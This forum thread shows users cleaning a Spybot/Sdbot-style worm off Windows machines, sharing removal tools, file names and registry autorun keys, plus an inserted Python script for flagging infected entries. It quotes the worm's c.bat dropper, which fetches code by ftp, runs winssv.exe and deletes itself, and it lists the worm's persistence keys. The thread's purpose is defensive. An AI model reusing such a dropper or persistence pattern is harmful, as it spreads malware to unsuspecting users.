bling,un1oad,msupdate32,winssv,winfirewall virus attack

SOLVED
Ron Kinner
Honored Contributor

bling,un1oad,msupdate32,winssv,winfirewall virus attack

Just an update to help others being attacked. Our company network is currently being hammered by a virus that Norton doesn't seem to be able to kill. It detects some of it but under status it says "Leave Alone." Other parts it skips right over.

I found a program called Pocket Killbox.exe

http://download.broadbandmedic.com/Killbox.exe

which will stop the evil processes and can even remove them. Then I run HijackThis and get it out of the registry that way.

The virus is using port 445. Our IT folk have not been keeping up with the MS patches which is understandable I guess since we were in Chapter 11 and are now being merged with our rivals and they have been laying off people right and left.

The worm creates a hidden system folder called !Submit and drops two files called bling.exe and load.exe in the folder. Seems to mutate as you kill it. Kill off bling.exe and a little later you have msconfig32.exe and a little while after that you have winssv.exe which is followed by winfirewall.exe. You also get several files with misspellings of load or loud and also an un1oad with a 1 (one) instead of an L. By using Killbox on the System Process menu you can usually kill all of the critters off but you have to be fast. (The Killbox instructions just say to type in the full path but it works better if you use the dropdown menu which says System Process, then select the bad file and press the yellow triangle.) That just stops the process (which Task Manager and Process Explorer can't do) and you still have to delete. Sometimes you have to use Killbox to delete the files. There is a small Open Folder icon which you can click on and then drill down to C:\winnt\system32. Once you select the file you can press the red button to kill it.

Then HijackThis will let you kill off the registry entries that start the mess. (The processes claim to be Microsoft Updates but don't believe them.) You have to kill the running processes off first or they put the registry entries right back after HijackThis finishes.

Before reconnecting to the network you have to install ZoneAlarm or it won't stay uninfected long enough to get any updates from MS. ZoneAlarm is really useful in another way since its alerts tell you which PCs are infected.

Got to run. Have another 20 PCs to clean.

Ron
10 REPLIES
Ron Kinner
Honored Contributor

Re: bling,un1oad,msupdate32,winssv,winfirewall virus attack

Oops, the hidden folder !Submit is actually created by Killbox when it deletes a file. It makes a backup copy so if you kill something you shouldn't have you can restore it.

Did find another version of the virus: svhost.exe

Ron
Jon Finley
Honored Contributor

Re: bling,un1oad,msupdate32,winssv,winfirewall virus attack

Interesting.... Port 445 is the standard port for file sharing.

Wondering if you invoked ICF or WF (SP2) if it would block the attacks (both ICF and WF are supposed to be "stateful", in that if you did NOT originate the request out the port, it will block the request incoming to the port).

Jon
"Do or do not. There is no try!" - Yoda
Ron Kinner
Honored Contributor

Re: bling,un1oad,msupdate32,winssv,winfirewall virus attack

Found a file called simply O in the Winnt\System32 folder. It tells the worm where to go to get bling.exe so in a sense it points you to the infection's source.

Jon,

Doubt we will get a chance to experiment. Now that we have a cure the emphasis is on getting everybody back up. But thanks anyway.

Ron
Ron Kinner
Honored Contributor

Re: bling,un1oad,msupdate32,winssv,winfirewall virus attack

I came up with a way to keep the virus from reinfecting a machine without Zone Alarm. We disconnect it from the network, kill the processes and delete them with Killbox, then replace them with read only files of the same name which we make with notepad. Then remove the triggers with HijackThis and go back on the network to download the latest patches. So far it seems to work.

Ron
David Laughinghouse
Occasional Visitor

Re: bling,un1oad,msupdate32,winssv,winfirewall virus attack

Hi Ron,

Deleting the files and replacing them with files of the same name but with read-only flag set is a great idea. However, this does assume that we know all of the files that have been or may be created by the Virus. If you have a list, I would more than appreciate a look see.

Thanks.

David
Lefebvre_5
Occasional Visitor
Solution

Re: bling,un1oad,msupdate32,winssv,winfirewall virus attack

Upon connecting to the net this morning Norton Antivirus found two virus files, o and .pif, and put them in quarantine... OK.
Then Norton Firewall warned that winaiva.exe was attempting to connect with a high risk attack rating.
I used Task Manager to end the task to be able to rename the file to _old.
I also discovered a c.bat which points to .pif and installs winssv like this:

@echo off
ftp -n -v -s:.pif
winssv.exe
del .pif
del /F c.bat
exit /y

Next step will be to check if the registry has been changed, but it seems that NAV made the right move before the worm could go further, as I didn't find winssv anywhere.
Lefebvre_5
Occasional Visitor

Re: bling,un1oad,msupdate32,winssv,winfirewall virus attack

More info about registry keys:

[Virus Known As (McAfee)]
W32/Sdbot.worm=1

[Virus Known As (Symantec)]
W32.Spybot.Worm=1

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\]
Win32 SSL Driver=winssv.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\]
Win32 SSL Driver=winssv.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\]
Win32 SSL Driver=winssv.exe

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\]
Win32 SSL Driver=winssv.exe

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\]
Win32 SSL Driver=winssv.exe

[FileCreated]
c:\windows\system32\winssv.exe=1

[ProcessCreated]
C:\WINDOWS\system32\winssv.exe=1

[ThreadCreated]
Count=4
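As an added example (not from this thread or any of its posters), here is a small Python triage script that reads a persistence-key listing in the INI-like format posted above and flags Run/RunOnce/RunServices values that point to one of the filenames reported in this thread, or to a bare filename with no directory (which Windows resolves by PATH lookup, so a copy dropped in system32 wins). The sample listing, and the harmless `updater.exe` entry in it, are constructed for the demonstration; the worm filenames are the ones the thread itself names.

```python
"""Flag suspicious autorun entries in a registry listing like the one above.

Added example, not part of the original thread. Input is assumed to be the
INI-style format Lefebvre_5 posted: [HKEY...\\Run\\] section headers followed by
"value name=command" lines.
"""
import os
import re

# Filenames this thread reports as belonging to the worm (lower-case).
WORM_FILENAMES = {
    "bling.exe", "load.exe", "un1oad.exe", "msupdate32.exe", "msconfig32.exe",
    "winssv.exe", "winfirewall.exe", "svhost.exe", "winaiva.exe",
}

# Autorun keys listed in the post; RunServices only exists on older Windows
# versions, but the check is identical for all three.
AUTORUN_KEY = re.compile(
    r"^\[(HKEY_(?:LOCAL_MACHINE|CURRENT_USER)\\SOFTWARE\\Microsoft\\Windows"
    r"\\CurrentVersion\\(?:Run|RunOnce|RunServices))\\?\]$",
    re.IGNORECASE,
)

# Constructed sample listing: two worm entries plus one ordinary, fully
# qualified entry that must not be flagged.
SAMPLE_DUMP = """
[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\]
Win32 SSL Driver=winssv.exe
Example Updater="C:\\Program Files\\Example\\updater.exe" /quiet

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunServices\\]
Win32 SSL Driver=winssv.exe

[HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\]
Microsoft Update=msupdate32.exe

[FileCreated]
c:\\windows\\system32\\winssv.exe=1
"""


def parse_dump(text):
    """Yield (key, value_name, command) for every line under an autorun key."""
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("["):
            m = AUTORUN_KEY.match(line)
            current = m.group(1) if m else None  # non-autorun sections are skipped
            continue
        if current and "=" in line:
            name, command = line.split("=", 1)
            yield current, name.strip(), command.strip()


def image_name(command):
    """Return the executable a Run value launches, as a bare lower-case filename."""
    cmd = command.strip()
    if cmd.startswith('"'):
        exe = cmd[1:].split('"', 1)[0]      # quoted path, possibly with spaces
    else:
        exe = cmd.split()[0] if cmd else ""  # first token before any arguments
    return os.path.basename(exe.replace("\\", "/")).lower()


def assess(text):
    """Return [(key, value_name, command, reasons)] for entries worth a look."""
    findings = []
    for key, name, command in parse_dump(text):
        reasons = []
        exe = image_name(command)
        if exe in WORM_FILENAMES:
            reasons.append("image name matches a filename reported for this worm")
        if "\\" not in command and "/" not in command:
            reasons.append("bare filename with no path (resolved by PATH lookup)")
        if reasons:
            findings.append((key, name, command, reasons))
    return findings


if __name__ == "__main__":
    for key, name, command, reasons in assess(SAMPLE_DUMP):
        print(f"{key}\n  {name} = {command}\n  -> {'; '.join(reasons)}")
```

Run it against a listing taken after the processes have been stopped: as the first post notes, the running worm rewrites these values as soon as they are removed, so a listing taken while it is still alive only tells you what it just put back.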

Ron Kinner
Honored Contributor

Re: bling,un1oad,msupdate32,winssv,winfirewall virus attack

Norton now seems to recognize the files that we found to be part of the worm.

I found the c.bat file too but forgot to mention it and didn't find it until after I had written my program. It had about the same date and time as the o file. The winaiva file never showed up so I guess you have a later mutation.

I will post my fakeit program as an attachment if anyone is interested. If you want to run it you will need to rename it to change the txt to bat.

Ron
Danny Lim_3
Occasional Visitor

Re: bling,un1oad,msupdate32,winssv,winfirewall virus attack

I have downloaded Killbox.exe, but I don't really know how to use it. Like, how do I know which are the bad files? If you could help to give a step by step how to do it, I would very much appreciate it. It can also help many other people like me who don't know much about computers.

Regards
Danny
Ron Kinner
Honored Contributor

Re: bling,un1oad,msupdate32,winssv,winfirewall virus attack

Danny,

If you don't know what file you want to kill then there is no point in using Killbox. Instead why don't you get HijackThis and Scan your system with it and then Save Log. Then start your own New Thread with HijackThis in the Subject with the log as an attachment and a short description of your problem. I will see it and tell you what to do next.

http://209.133.47.12/~merijn/files/HijackThis.exe

Ron